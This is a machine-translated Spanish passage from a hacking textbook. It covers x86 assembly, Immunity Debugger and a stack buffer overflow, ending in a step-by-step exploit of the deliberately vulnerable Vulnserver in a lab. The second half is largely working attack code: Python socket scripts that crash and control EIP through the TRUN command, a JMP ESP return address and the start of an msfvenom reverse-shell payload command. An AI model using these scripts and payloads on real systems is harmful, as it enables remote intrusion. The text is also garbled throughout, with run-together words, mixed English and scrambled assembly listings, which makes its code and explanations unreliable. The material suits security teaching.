Tipos de datos Canal de Telegram : @IRFaraExam Machine Translated by Google ESCRIBE ASM #BITS Byte Byte 8 bits Palabra Palabra de 16 bits Palabra doble Dword 32bits Palabra cuádruple Qword 64bits Recuerde, el byte es de 8 bits, la palabra es 16, la palabra doble es 32 y la palabra cuádruple es de 64 bits. Debe familiarizarse con los tipos de datos para no perderse cuando vea estos tipos de datos como mover una dirección de 32 bits DWORD a ESP. Eventualmente se convertirán en una segunda naturaleza cuando trabajes en explotación. Segmentos de memoria Demasiadas cosas, ¿verdad? En la Figura 15.5, puede ver las áreas de segmentación de la memoria. El área de texto es donde se almacenan las instrucciones de ensamblaje. Los datos y BSS son para almacenamiento variable. El montón es una ubicación en la memoria donde puede almacenar y manipular datos dinámicamente. Figura 15.5 Segmentos de memoria Modos de direccionamiento Hay diferentes métodos para manipular un registro. La Tabla 15.6 resume todos los tipos de modos de direccionamiento. Basado en la Tabla 15.6, estamos moviendo un registro a un registro primero en la parte superior. En el siguiente, estamos eliminando un número a un registro. En el tercer elemento, estamos eliminando un número a una dirección de memoria. Finalmente, estamos eliminando el valor en el registro EBX a la dirección de memoria almacenada en el registro EAX . Tabla 15.6 Modos de direccionamiento Canal de Telegram : @IRFaraExam Machine Translated by Google NOMBRE EJEMPLO Registrarse MOVEAX, ECX MOVEAX inmediato,0C Directo MOV[AC1177FF],0C Registro MOV indirecto [EAX], EBX Ejemplo de ingeniería inversa En esta sección, crearemos un programa C simple que podemos usar para la ingeniería inversa en la siguiente sección. Aquí, la ingeniería inversa significa inspeccionar sus instrucciones en lenguaje ensamblador para visualizar y comprender cómo funciona el procesamiento de bajo nivel debajo del capó. VisualStudioCode para C/C++ Para este ejemplo práctico, estamos utilizando Windows 10 como sistema operativo. (Debería acostumbrarse a usar ejercicios de desbordamiento de búfer e ingeniería inversa en su sistema operativo Windows. ¿Por qué? Porque el 90 por ciento de las aplicaciones explotadas se basarán en el sistema operativo Windows). A continuación, instalaremos Visual Studio Code (que es gratuito) descargándolo de la siguiente URL: code.visualstudio.com/download Una vez instalados, añadiremos los plugins de C++ para poder desarrollar nuestros programas C y C++. Para instalar la extensión Microsoft C/C++, siga estos pasos: 1.Haga clic en el icono de vista Extensiones en la barra lateral (Ctrl+Mayús+X). 2.BuscarC++. 3.Haga clic en Instalar. Tendremos que instalar un segundo complemento en nuestro programa C, y se llama CodeRunner. Siga los mismos pasos anteriores para instalar este complemento también. Hay un paso más antes de que comencemos a ejecutar nuestro programa C: debemos instalar los archivos binarios de Mingw desde el siguiente enlace (puede buscarlo en Google ya que es una URL larga; el enlace de descarga está en https://SourceForge.net): https://sourceforge.net/projects/mingw w64/files/ Toolchains%20targetting%20Win32/Personal%20Builds/mingw Canal de Telegram : @IRFaraExam Machine Translated by Google compilaciones/instalador/mingw-w64-install.exe/descarga Una vez descargado, debe seguir las instrucciones para instalarlo en su sistema operativo Windows. A continuación, debe agregarlo a su variable PATH siguiendo estos pasos: 1. En la barra de búsqueda de Windows, escriba configuración para abrir su Configuración de Windows. 2. Busque las variables de entorno Edit para su cuenta. 3. Elija la variable Ruta y, a continuación, seleccione Editar. 4. Seleccione Nuevo y agregue la ruta Mingw-w64 a la ruta del sistema. La ruta exacta depende de la versión de Mingw-w64 que haya instalado y de dónde haya instalado la edición . 5.Haga clic en Aceptar para guardar la RUTA actualizada. ventanas para que la nueva ubicación de PATH esté disponible. Para comenzar con la programación, seleccione el menú Archivo y luego haga clic en el elemento Nuevo archivo (o presione Ctrl+N). A continuación, agregue el siguiente código dentro del nuevo archivo vacío: #include<stdio.h> intmain() { char*mensaje="HolaMundo\n"; printf(mensaje); retorno0; } Antes de compilar el programa, necesitamos guardarlo primero. Entonces, presione Ctrl+S en su teclado para guardarlo y asegúrese de seleccionar el tipo como C (en mi caso, el nombre de mi programa será HelloWorld.c ). Después de guardar el archivo, tendremos que depurar/ejecutar la unidad. Haga clic con el botón derecho en cualquier lugar dentro del archivo y seleccione el elemento Ejecutar código del menú (el primero en la parte superior). [Ejecutando]cd"c:\Users\admin\"&&gccHelloWorld.c-oHelloWorld&&"c:\Users\admin\"HelloWorld HelloWorld Canal de Telegram : @IRFaraExam Machine Translated by Google [Listo] salió con código = 0 en 0.237 segundos Antes de comenzar el proceso de ingeniería inversa , repasemos el programa. Primero, incluimos la biblioteca estándar de entradaÿsalida para imprimir en la pantalla (porque usaremos la función printf ). Luego, creamos la función principal que contiene la lógica de este programa. Después de eso, declaramos un mensaje de variable de cadena . ”mensaje utilizando la función printf . Finalmente, un retorno a cero indica que el programa, ha finalizado con éxito. Depurador de inmunidad para ingeniería inversa Ahora es el momento de comenzar a practicar las instrucciones del lenguaje ensamblador que aprendió anteriormente en este capítulo. Para este ejercicio, usaremos Immunity Debugger para mostrar las instrucciones de ensamblado del programa Hello World (que creamos anteriormente en el ejemplo de Ccode). Puede descargar una copia de este software en www.immunityinc.com/products/debugger/ Una vez que haya instalado edit, ejecute las unidades para que pueda seguir el ejercicio. Para abrir el programa Hello World, vaya al menú Archivo, seleccione Abrir y luego navegue hasta donde guardó el archivo Hello World.exe . Cuando tiene un programa dentro de Immunity, comienza en estado de pausa y puede verlo en la Figura 15.6 en la esquina inferior derecha. Para acceder a la función principal de la aplicación Hello World, desplácese hacia abajo en el panel superior izquierdo hasta que vea el patrón que se muestra en la Figura 15.7. Echemos un vistazo rápido al entorno del depurador (consulte la Figura 15.6). Como puede ver, tenemos cuatro paneles en Immunity. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 15.6 Inmunidad en pausa Figura 15.7 Instrucciones de la función principal En el de arriba a la izquierda, tenemos todas las instrucciones de la CPU. La instrucción resaltada es SUBESP, 0C (ver Figura 15.6); significa restar de ESP el valor 0C (esta es una representación hexadecimal). A la izquierda de la instrucción de ensamblaje, primero verá la dirección de memoria de esta instrucción, luego el código de operación y finalmente el código de ensamblaje. Contiene el operando fuente, que es OC, en este caso, el operando destino, ESP. Otra cosa a tener en cuenta en esta sección es el código de operación; usaremos el código de operación más adelante (en el próximo capítulo) cuando inyectemos nuestro código shell para la explotación. Por lo tanto, un código shell es una serie de códigos op. Canal de Telegram : @IRFaraExam Machine Translated by Google instrucciones de ensamblaje que queremos inyectar como un shell remoto, por ejemplo. Espere, aún no hemos terminado; asegúrese de que estas instrucciones se guarden en la memoria en un lugar llamado texto. Sigamos el encabezado de esta instrucción y la veamos en vivo en la memoria. Haga clic con el botón derecho en la instrucción y seleccione Seguir en el volcado; Figura 15.8 Seguimiento en volcado Ahora revise la sección inferior izquierda (vea la Figura 15.9); la dirección está resaltada y muestra el código de operación 83EC0C. Figura 15.9 Ventana de volcado de memoria Si desea ver toda la memoria, seleccione el menú Ver y seleccione el elemento Memoria, como se muestra en la Figura 15.10. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 15.10 Menú del mapa de memoria ¿Recuerdas cuando se dijo anteriormente que las instrucciones de ensamblaje se almacenan en la sección de texto de la memoria? Ahora puedes ver la prueba frente a ti; consulta la figura 15.11. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 15.11 Ventana del mapa de memoria Si hace doble clic en la línea de texto de la aplicación Hello World, le mostrará todas las instrucciones de montaje almacenadas en esta área, como se muestra en la Figura 15.12. Figura 15.12 HelloWorld.text Impresionante. Ahora, ¿qué pasa con los demás (cerrar la ventana de volcado primero)? Antes de cerrar la ventana de memoria, verifique la diferencia en la columna de acceso entre la sección de texto y la sección bss (consulte la Figura 15.11). En el área de texto, puede leer y ejecutar, ¡pero en el bss puede leer y escribir! Esto es protección, porque los diseñadores del sistema operativo no quieren que escriba su código en la sección de texto porque podrá ejecutar lo que quiera, ¿verdad? Canal de Telegram : @IRFaraExam Machine Translated by Google desbordamiento de búfer en el capítulo siguiente. Cierre esta ventana de Mapa de memoria y vuelva a la ventana de la CPU. Entonces, cubrimos la sección de instrucciones de la CPU y la sección de volcado de memoria. En la parte superior derecha, tenemos los registros de la CPU (vea la Figura 15.13). Recuerde que estos registros están ubicados físicamente en la propia CPU (ya cubrimos todos estos registros en la sección básica). Figura 15.13 Registros La esquina final (en la parte inferior derecha) está dedicada a las operaciones de la pila. Por ahora, comprenda que la pila tiene la parte inferior indicada por el puntero base (EBP), y la parte superior está indicada por el puntero de la pila (ESP), como se muestra en la Figura 15.14. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 15.14 Pila Resumen Es normal si siente que este capítulo es difícil. El lenguaje ensamblador es único. Al igual que con cualquier otra cosa, necesita practicar lo que ha aprendido hasta ahora. Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 16 Desbordamiento de búfer/pila En el capítulo anterior, aprendió sobre las instrucciones de ensamblaje. Después de eso, vio cómo usar Immunity Debugger para visualizar las instrucciones internas de un programa (ingeniería inversa actual). Antes de comenzar, ya debe comprender los conceptos básicos de las instrucciones del lenguaje ensamblador y debe haber practicado los ejemplos del capítulo anterior. Los temas sobre los que aprenderá en este capítulo incluyen los siguientes: Basicsofthestack Cómoexplotarlapila El flujo de trabajo para lograr un desbordamiento de búfer Conceptos básicos de StackOverflow Ahora que comprende los fundamentos de la ingeniería inversa, es hora de comenzar con algo más significativo para la explotación. Descripción general de la pila Para resumir, una pila se usa para asignar almacenamiento a corto plazo para los parámetros de función y las variables locales de esa función. Es importante saber que se crea una nueva pila cada vez que no funciona. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 16.1 Punteros de pila Quiero mencionar dos instrucciones críticas que la pila usa con frecuencia, las instrucciones PUSH y POP. ¿Cuáles son estas instrucciones de todos modos? Las cubriremos en detalle en las próximas secciones. PUSHInstrucción Comencemos con un ejemplo para ver cómo funciona la instrucción PUSH. ¿Qué sucede cuando decimos PUSHEBP, suponiendo que el valor de EBPregister es 0589AFCC ? Figura 16.2 EMPUJEBP En la Figura 16.2, le muestro que cuantos más elementos agrega a la pila, la dirección se mueve hacia arriba y eso hace que las direcciones sean más bajas. Canal de Telegram : @IRFaraExam Machine Translated by Google hacia arriba, más tocado disminuirá. POPInstrucción La instrucción POP es lo opuesto al mecanismo PUSH. Supongamos que tiene la instrucción POPEAX, luego el valor 0589AFCC (que usamos en la instrucción PUSH) se eliminará de la parte superior de la pila. Al mismo tiempo, el valor 0589AFCC se moverá al registro EAX. CProgramEjemplo La mejor manera de entender cómo funciona la pila es a través de un ejemplo real. El lenguaje C es un gran lenguaje para usar cuando se trata de aprender las instrucciones de ensamblaje. No se preocupe si no sabe cómo funciona la programación C / C ++; repasaremos cada línea de ajuste . En el capítulo anterior, usted vio un programa HelloWorld.c . En esta sección, llevaremos las cosas al siguiente nivel y crearemos un programa para visualizar el búfer: //labibliotecastring.hesnecesariaparamanipularlacadenaenC #include<string.h> // Lafuncióndecopiacopiaráunmensajedecadenaenelbúfer. //Char*significa una cadena en C. voidcopy(char*mensaje) { //Declarar una matriz de caracteres charbuffer[15]; // copia el argumento del mensaje en la matriz de búfer strcpy (búfer, mensaje); } //La función principal es la que se llama al principio cuando se inicia el programa intmain(intargc,char*argv[]){ //variablelocalentero intlocal_variable=1; //Llamar a la función de copia y pasar el valor del argumento ingresado por el usuario en la línea de comando. copiar(argv[1]); //salir de la aplicación return0; } Canal de Telegram : @IRFaraExam Machine Translated by Google WhathappenedinthisCprogram? En primer lugar, wecreatedthemainfunctionthattakes argumentsfromthecommandline.The argc istheargumentscounter, y argv isanarrayofstrings.Youalwaysstartwith1sinceargument0istheapplication nameandnottheargumentitself (argv [1], argv [2], etc., willcontainthe-lineinput valueofthecommand) .Onthefirstline (insidethe función principal), que declaredadummyintegervariable toseehowitwillfit (local_variable) durante el proceso de ingeniería inversa. A continuación, llamamos a la función de copia y pasamos el argumento de cadena que ingresamos en la línea de comando. En la función de copia, creamos una matriz de caracteres; aquí es donde alm Análisis de búfer con ImmunityDebugger Ahora hagamos ingeniería inversa de este programa utilizando Immunity Debugger . Para compilar y generar el archivo .exe , deberá seguir el mismo patrón que hicimos para el programa Hello World en el capítulo anterior . Abra Immunity Debugger y, esta vez, cuando seleccione Abrir archivo en el menú, ingrese una entrada en el campo de argumentos ABCD (vea la figura 16.3). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 16.3 ImmunityDebugger, abriendo un archivo Una vez cargado ImmunityDebugger, desplácese hacia abajo en la ventana de instrucciones (el ventana superior izquierda) hasta que vea el siguiente grupo de instrucciones (dirección las ubicaciones serán diferentes en su lado): 004015C0/$55PUSHEBP 004015C1 | .89E5004015C3 | .83EC28004015C6 | .8B4508004015C9 | .89442404004015CD | .8D45E9004015D0 | .890424004015D3 | .E8DC0F0000004015D8 | .90004015D9 | .C9004015DA \ .C3004015DB / $ 55004015DC | .89E5004015DE | .83E4F0004015E1 MOVEBP,ESP SUBESP,28 MOVEAX,DWORDPTRSS:[EBP+8] MOVDWORDPTRSS: [ESP+4],EAXLEAEAX,DWORDPTRSS:[EBP-17] MOVDWORDPTRSS: [ESP],EAXCALL<JMP.&msvcrt.strcpy>NOP | .83EC20004015E4 EMPUJAR | .E8B7000000004015E9 | .C744241C0100> MOVEBP,ESP ANDESP,FFFFFFF0 SUBESP,20 LLAMADASimpleBu.004016A0 MOVDWORDPTRSS:[ESP+1C],1 MOVEAX,DWORDPTRSS:[EBP+C] ADDEAX,4 MOVEAX,DWORDPTRDS:[EAX] MOVDWORDPTRSS:[ESP],EAX LLAMADASimpleBu.004015C0 MOVEAX,0 SALIR SALIR RENTAR RENTAR 004015F1|.8B450C004015F4|.83C004004015F7|.8B00004015F9|.890424004015FC|.E8BFFFFFFF00401601|.B80000000000401 NOP En la parte superior, la función de copia comienza aquí: 004015C0/$55PUSHEBP Lafunciónprincipalcomienzaenlasiguientelínea: 004015DB/$55PUSHEBP Agregue un punto de interrupción donde declaró la variable entera ficticia (dentro del función principal). Agregue un punto de interrupción haciendo clic con el botón derecho y seleccionando Punto de interrupción ÿ Alternar (un punto de interrupción es una ubicación en el código fuente donde desea que detener el programa) Canal de Telegram : @IRFaraExam Machine Translated by Google 004015E9|.C744241C0100>MOVDWORDPTRSS:[ESP+1C],1 Una vez establecido el punto de interrupción, haga clic en Ejecutar (consulte la Figura 16.4) en la pequeña barra de herramientas para ejecutar las instrucciones y detener la línea de punto de interrupción elegida. Figura 16.4 ImmunityDebugger, Botón Ejecutar Creamos estas variables ficticias para que pueda ver cómo se copian las variables en la pila. Para ver este proceso en acción, haga clic en Pasar por encima (tres botones a la derecha del botón Ejecutar) o use la tecla F8 para ir a la siguiente línea. Inspeccionemos la ventana de la pila de cerca (ventana inferior derecha); si está siguiendo junto con su dirección, sus números serán totalmente diferentes a los que ve aquí; 0061FEB000000005… 0061FEB400770DF0ð.w. 00618FEB/0061FF68hÿa. 0061FEBC|0040167B{ÿ@.RETURNtoSimpleBu.0040167BfromSimpleBu.004014C0 0061FEC0|00401610ÿ ÿ@.SimpleBu.00401610 0061FEC4|00000000…. 0061FEC8|00000005ÿ… 0061FECC|00000001ÿ… 0061FED0|00000005ÿ… 0061FED4 | 00770DF0ð.w. 0061FED8|0061FF68hÿa. Como puede ver, el valor 1 se ha copiado en la pila en la dirección 0061FECC. ¿Por qué se almacena el valor 1 en esta dirección? De acuerdo con las instrucciones de ensamblado, el número 1 debe almacenarse en ESP+1C; usando una calculadora binaria, los resultados son iguales a 61FECC. Ahora ya sabe cómo un programa almacena una variable en la pila. A continuación, use el botón Paso a paso para avanzar y detener la siguiente línea (justo antes de que llamemos a la función de copia): 004015FC|.E8BFFFFFFFCALLSimpleBu.004015C0 Esta instrucción llamará a la función de copia, pero antes de llamarla, inspeccionemos qué hay dentro de la pila: Canal de Telegram : @IRFaraExam Machine Translated by Google 0061FEB000770E48Hw.ASCII"ABCD" 0061FEB400770DF0ð.w. 00618FEB/0061FF68hÿa. Como puede ver, el valor de entrada ABC se Desalmacenó antes de ejecutar la función de copia. ¿Por qué? Recuerde que este valor es un parámetro para esta función, sin él, la función de copia no se podrá ejecutar correctamente. Para continuar con la función de copia, usaremos el botón Step Into del menú (no Step Over que usamos anteriormente). Una vez que haga clic en el botón Step Into, la instrucción resaltada se moverá a la función de copia: 004015C0/$55PUSHEBP Veamos la creación de la pila en la función de copia: 004015C0/$55PUSHEBP 004015C1|.89E5MOVEBP,ESP 004015C3|.83EC28SUBESP,28 Mover ESP a EBP los hará iguales, ¿verdad? En otras palabras, esto es lo que parece en esta etapa. La pila está vacía, y la base y la parte superior de la pila son iguales. A continuación, el compilador resta 28 del registro ES; Y listo , la pila de la función de copia ha sido creada con éxito: 0061FE800061FE6Clþa. 0061FE84000001300.. 0061FE880061FFCCÌÿa. 0061FE8C74E3CCC0ÀÌãtmsvcrt.74E3CCC0 0061FE90AAD8B1B6¶ ± ت 0061FE94FFFFFFFEþÿÿÿ 0061FE98 / 0061FF68hÿa. 0061FE9C | 004014CFïÿ @ .RETURNTOSIMPLEBU.004014CFFROM <JMP. Y MSVCRT._ONEXIT> 0061FEA0 | 00401610ÿ ÿ 00401610ÿ ÿ 0061FEBU.00401610 0061FEA4 | 7769F94ES'IRTRETURNTONTL.7769F94EFLL.776F94EFROMNTLL.7769F960 0061FEA8 | 0061FED8ØþA. A continuación, el ensamblador copia la dirección ABCD en la pila actual: 004015C6|.8B4508MOVEAX,DWORDPTRSS:[EBP+8] 004015C9|.89442404MOVDWORDPTRSS:[ESP+4],EAX Luego, las siguientes dos líneas se agregarán a la parte superior de la pila del tocado donde la cuerda Canal de Telegram : @IRFaraExam Machine Translated by Google será copiado: 004015CD|.8D45E9LEAEAX,DWORDPTRSS:[EBP-17] 004015D0|.890424MOVDWORDPTRSS:[ESP],EAX Cuando vamos después de la función strcpy , puede ver ( 0061FE90434241B6¶ABC ) el ABCDASCII se copia en orden inverso. ¿Recuerda el little endian que cubrimos en el capítulo anterior? 0061FE800061FE91'þa.ASCII "ABCD" 0061FE8400BB0E48H».ASCII"ABCD" 0061FE880061FFCCÌÿa. 0061FE8C74E3CCC0ÀÌãtmsvcrt.74E3CCC0 0061FE90434241B6¶ABC 0061FE94FFFF0044D.ÿÿ 0061FE98 / 0061FF68hÿa. 0061FE9C|004014CFÏÿ@.RETURNtoSimpleBu.004014CFfrom<JMP.&msvcrt._onexit> 0061FEA0|00401610ÿ ÿ@.SimpleBu.00401610 0061FEA4|7769F94ENùiwRETURNtontdll.7769F94Efromntdll.7769F960 0061FEA8| 0061FED8Øþa. Desbordamiento de pila En este capítulo, desarrollamos el programa C (Simple Buffer.c ) porque es vulnerable al desbordamiento de pila. Esta es la diferencia entre un desarrollador normal y un analista de seguridad. voidcopy(char*mensaje) { //Declarar una matriz de caracteres charbuffer[15]; // copia el mensaje en la matriz de búfer strcpy (búfer, mensaje); } Está recibiendo un parámetro de mensaje y ¿quién controla la entrada para esta función? ¿Lo has adivinado? Es el usuario a través de la línea de comandos, ¿y si ese usuario es un hacker? Canal de Telegram : @IRFaraExam Machine Translated by Google Si observa detenidamente esta función, verá un límite de tamaño de matriz de búfer fijo declarado de 15. Ahora, ¿qué sucede si un usuario envió más de 15? Abramos el depurador de inmunidad y carguemos el mismo programa, pero esta vez vamos a poner el hacker hacker e intentar destruir la pila. Bueno, intentemos atacar el programa escribiendo muchos As (más de 15 como mínimo) en el campo de argumento (en lugar de ABCD) y haciendo clic en Abrir (eligiendo la letra A es aleatoria; puede ser B o C, etc.). 004015E9|.C744241C0100>MOVDWORDPTRSS:[ESP+1C],1 En esta etapa, agregaremos otro punto de interrupción en la instrucción NOP justo después de la línea donde se copió el búfer: 004015D3|.E8DC0F0000CALL<JMP.&msvcrt.strcpy>004015D8|.90NOP Una vez establecido el punto de interrupción, haga clic en Ejecutar para ejecutar y detener la instrucción NOP. ¿Adivina qué? Simplemente desbordamos la pila con As: 0061FE8400B10EC8ȱ.ASCII"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0061FE880061FFCCÌÿa. 0061FE8C74E3CCC0ÀÌãtmsvcrt.74E3CCC0 0061FE90414141D3óAAA 0061FE9441414141AAAA 0061FE9841414141AAAA 0061FE9C41414141AAAA 0061FEA041414141AAAA 0061FEA441414141AAAA 0061FEA841414141AAAA 0061FEAC41414141AAAA 0061FEB041414141AAAA La figura 16.5 muestra lo que sucede cuando hacemos clic en Ejecutar. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 16.5 Mensaje de error Echa un vistazo a este divertido mensaje; está llorando como un bebé: “No sé cómo continuar porque la dirección de memoria 414141 no se puede leer”. ¡Por supuesto, no se puede leer! En las próximas secciones, veremos cómo hacer esta acción. StackOverflowMechanism ¿Qué sucedió realmente cuando llenamos la pila con As? La pregunta más importante, ¿por qué se llena el EIP con As? (¿Por qué no EBX o ECX, y pronto?) La respuesta más fácil es que cada función (como la función de copia en nuestro programa C) necesitará almacenar la dirección de retorno en el registro EIP, y este valor se guardará temporalmente en la pila/búfer como se muestra en la Figura 16.6. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 16.6 Estructura de pila Dado que el tamaño del búfer está limitado a 15 en nuestro programa C y lo llenamos con muchos A, el escenario que se muestra en la Figura 16.7 se ha ejecutado en lugar del comportamiento normal. En realidad, EIP se llenará solo con 4 A porque su tamaño es de solo 4 bytes. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 16.7 Llenar el búfer con As StackOverflowExplotación Esta sección tomará el concepto de desbordamiento de búfer para explotar un servidor remoto y obtener un shell remoto. Después de todo, este capítulo pretende mostrarle cómo puede aprovechar esta técnica y usarla en escenarios de la vida real. Descripción general del laboratorio Para los siguientes ejemplos de esta sección, usaremos diferentes herramientas para lograr la explotación del desbordamiento del búfer. Aplicación Vulnerable La aplicación vulnerable que usaremos en este isla está dedicada a la explotación. La aplicación vulnerable se llama Vulnserver y está disponible en GitHubat github.com/stephenbradshaw/vulnserver: AtacanteSistemaOperativo Canal de Telegram : @IRFaraExam Machine Translated by Google SO: KaliLinux IP: 172.16.0.103 VíctimaSistemaOperativo Sistema operativo: Windows10x86 IP: 172.16.0.102 Herramientas Instaladas: Depurador de inmunidad servidor de vulnerabilidades Fase 1: Prueba En el primer paso, haremos una prueba para ver si la aplicación es vulnerable al desbordamiento del búfer. Probando HappyPath Primero, necesitamos ejecutar el servidor Vuln en nuestro host de Windows. La aplicación estará escuchando las conexiones entrantes en el puerto 9999: C:\Users\Gus\Downloads\vulnserver-master\vulnserver master>vulnserver.exe Iniciandovulnserverversion1.00 Calldessentialfunctiondllversion1.00 ¡Este es un software vulnerable! ¡No permita el acceso desde sistemas o redes que no sean de confianza! Esperando las conexiones del cliente… Por otro lado, probaremos esta aplicación usando nuestra Kali VM. Para probar la conectividad de este servidor, usaremos netcat para hacer el trabajo: root@kali:~#nc-nv172.16.0.1029999 (DESCONOCIDO) [172.16.0.102]9999(?)abrir ¡Bienvenidoaservidorvulnerable! IngreseAYUDAparaayuda. AYUDA Comandos válidos: Canal de Telegram : @IRFaraExam Machine Translated by Google AYUDA ESTADÍSTICAS[valor_estadístico] RTIME[rtime_value] LTIME[ltime_value] SRUN[valor_ejecución] TRUN [valor_trun] GMON[valor_gmon] GDOG[valor_gdog] KSTET[valor_kstet] GTER[valor_gter] HTER [valor_hter] LTER[valor_filtro] KSTAN[valor_lstan] SALIDA Como puede ver, la aplicación remota acepta diferentes comandos una vez que estamos conectados de forma remota . Ahora, es momento de comenzar a construir nuestro PoC usando una secuencia de comandos de Python. En esta secuencia de comandos, enviaremos solo 10 As al servidor (usaremos el método TRUN del servidor ), y no esperamos que se bloquee: #Importthenetworksocketlibrary importsocket #send10A'stotheserver test="A"*10try: #crearunobjetodesocketparaconectarconlosservidores=socket.socket(socket.AF_INET,socket.SOCK_STREAM) conn=s.connect( #Espere y reciba algunos datos en la recepción (1024) print ("Éxito") #Si ocurre un error/excepción, entonces ejecute esta línea excepto: print("OcurrióError") finalmente: Canal de Telegram : @IRFaraExam Machine Translated by Google #conexión cercana cerrar() Cuando se ejecutó el script de Python, se muestra el mensaje de éxito, por lo que la prueba de ruta feliz ha funcionado correctamente: root@kali:~/BFO#pythonHappy_test.pySuccess ProbandoelCrash En lugar de enviar solo 10 A, enviaremos 10 K para bloquear el servidor (los 10 K Como usamos cuando iniciamos la prueba de desbordamiento de búfer es solo un número aleatorio para asegurarnos de que podremos bloquear la aplicación): importsocket importsys #send10000A'stotheserver crash="A"*10000 pruebe: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) conn=s.connect(('172.16.0.102',9999)) s.recv(1024) s.send('TRUN/.:/'+ crash) s.recv(1024) excepto: print("ErrorOccured") sys.exit(0) finalmente: s.close() Ejecutar el script de Python anterior bloqueará el servidor remoto: root@kali:~/BFO#pythoncrash.pyErrorOcurrió Fase 2: tamaño del búfer Nuestro próximo objetivo es estimar el tamaño del búfer de la pila. ¿Por qué? Porque queremos saber dónde está ubicado el EIP (consulte la Figura 16.6) para que podamos insertar la instrucción de ensamblaje para apuntar a nuestra ejecución de carga útil (lo haremos en la fase 3). PatrónCreación Canal de Telegram : @IRFaraExam Machine Translated by Google Machine Translated by Google proceso haciendo clic en el menú Archivo y luego seleccionando Adjuntar de la lista. Se abrirá una nueva ventana y seleccionaremos la aplicación de la lista (se llama Vulnserver). Una vez que hagamos clic en Adjuntar, Immunity se pausará. root@kali:~/BFO#pythonmsf_chunk.py El programa Python debería colgarse en esta etapa, pero mirando de cerca el Host de Windows, podré ver algunos resultados prometedores en la ventana Registros dentro de Immunity: EAX00A8F1E8ASCII "TRUN /.:/ Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac ECX00E55118 EDX00006BD7 EBX000000C0 ESP00A8F9C8ASCII "Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr EBP6F43366F ESI00401848vulnserv.00401848 EDI00401848vulnserv.00401848 EIP386F4337 Anotemos el valor de EIP y suministrémoslo a Metasploit para que devuelva el tamaño exacto del búfer mediante la herramienta pattern_offset : root@kali:/usr/share/metasploit-framework/tools/exploit#./pattern_offset.rb-l10000q386F4337 [*]Coincidencia exacta enoffset2003 Fase 3: control de EIP Para visualizar lo que sucedió hasta ahora, creemos la siguiente carga útil: 2003As+4Bs+5000Cs Estamos usando 2003As (A=41 en hexadecimal) porque ese es el tamaño del búfer. Cuatro Bs (B=42 en hexadecimal) representarán el tamaño de EIP (porque el tamaño de EIP es de 4 bytes). Finalmente, estamos leyendo unos 5,000 C caracteres aleatorios (C = 43 en hexadecimal) para mostrar cómo se ve después de la EIP: Canal de Telegram : @IRFaraExam Machine Translated by Google importsocket importsys prueba_eip="A"* 2003+"B"* 4+5000 *"C" pruebe: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) c=s.connect(('172.16.0.102',9999)) s.recv(1024) s.send('TRUN/.:/'+ test_eip) s.recv(1024) excepto: print("ErrorOccured") sys.exit(0) finalmente: s.close() Después de guardar el script de Python, realice los siguientes pasos: 1. En el host de Windows, asegúrese de que Vulnserver.exe se esté ejecutando. 2. En el host de Windows, ejecute Immunity Debugger y adjunte la aplicación. 3. En Inmunidad (después de adjuntar el proceso), haga clic en el botón Ejecutar y espere. 4. En Kali, ejecute el script de Python. 5. Inspeccione los resultados dentro de Immunity Debugger (consulte la figura 16.8). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 16.8 Desbordamiento de pila con A, B y C Preste atención a la ventana de la pila. ¿Ve cómo encajan A, B y C? Tenga esta imagen (Figura 16.8) en mente. La usaremos para visualizar cómo explotar la aplicación Vulnserver en los próximos pasos. AgregarlainstrucciónJMP ? Nowthatyoucancontrolthestack, thenexttaskistoinstructEIPtoexecutethe JMPESPinstruction.WhyJMPESP MyendgoalistofilltheESPwithmy shellcodepayload (lookingat Figure16.8, youshouldseethattheESPvalueis filledwithCs) .Butbeforethat, theEIPaddresslocationwillinstructthe assemblertoexecutetheshellcodeusingtheJMPESPassemblyinstruction.But espera Wecan'tjustinsertJMPESPinEIP; wewillfillEIPwiththeaddressof thatinstruction (JMPESPinthiscase) .Again, wewilluseImmunityDebugger tolocatearandomJMPESPaddresslocation.Togetthejobdone, followthese pasos: 1. En el host de Windows, asegúrese de que Vulnserver.exe se esté ejecutando. 2. En el host de Windows, ejecute Immunity Debugger y adjunte la aplicación. Canal de Telegram : @IRFaraExam Machine Translated by Google 3. En Inmunidad (después de adjuntar el proceso), haga clic en Ejecutar. 4.Haga clic con el botón derecho dentro de la ventana Instrucciones de ensamblaje (arriba a la izquierda) y seleccione BuscarÿTodos los comandos en todos los módulos. 5. Una vez que se abra la ventana Buscar, ingrese jmpesp y haga clic en el botón Buscar. 6. Se mostrarán todos los artículos con todas las instrucciones correspondientes. Elija el siguiente (en su extremo, los tocados y sus ubicaciones serán diferentes): a.Dirección=625011AF b.Desmontaje=JMPESP c.ModuleName=C:\Users\Gus\Downloads\vulnserverÿ master\vulnserverÿmaster\essfunc.dll Antes de pasar a la sección de código de shell, debe saber cómo manejar la dirección que encontramos. ¿Recuerda el principio de littleÿendian del capítulo anterior? De hecho, en el código de Python que verá en la siguiente sección, utilizaremos el siguiente valor para el EIP: . y el resto es el inverso \xAF\x11\x50\x62\x en Python significa que este es un valor hexadecimal, del valor de dirección real (eso es mostrar el trabajo de little endian). Fase 4: Inyectar la carga útil y obtener un shell remoto Es hora de los resultados finales. ¿Está emocionado? Este es el momento en el que llevamos un shell remoto al host víctima de Windows. Generación de carga útil Usemos MetasploitMSFvenom para generar una carga útil de shell inversa: raíz @ kali: ~ # MSFvenom-PWindows / shell_reverse_tcplhost = 